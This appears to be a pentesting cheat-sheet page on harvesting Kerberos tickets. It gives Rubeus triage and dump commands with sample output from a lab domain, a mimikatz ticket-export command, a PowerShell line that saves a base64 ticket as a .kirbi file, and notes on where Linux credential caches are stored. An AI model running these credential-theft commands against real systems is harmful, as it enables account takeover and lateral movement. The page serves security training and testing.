88 - Kerberos
Harvest tickets from Windows
Rubeus triage
will list the Kerberos tickets in all the logon sessions currently on a system. If you're not in a elevated state it can only show tickets in your own logon session.
C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
------------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
------------------------------------------------------------------------------------------------------------------
| 0x79474 | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:13:03 PM |
| 0x3e4 | srv-1$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:11:00 PM |
| 0x1f8cd | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:10:56 PM |
# Using mimikatz
sekurlsa::tickets /export
# Dump all tickets with Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
Harvest tickets from Linux
On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:
Files, by default under /tmp directory, in the form of krb5cc_%{uid}.
Kernel Keyrings, an special space in the Linux kernel provided for storing keys.
Process memory, used when only one process needs to use the tickets.
Last updated
Was this helpful?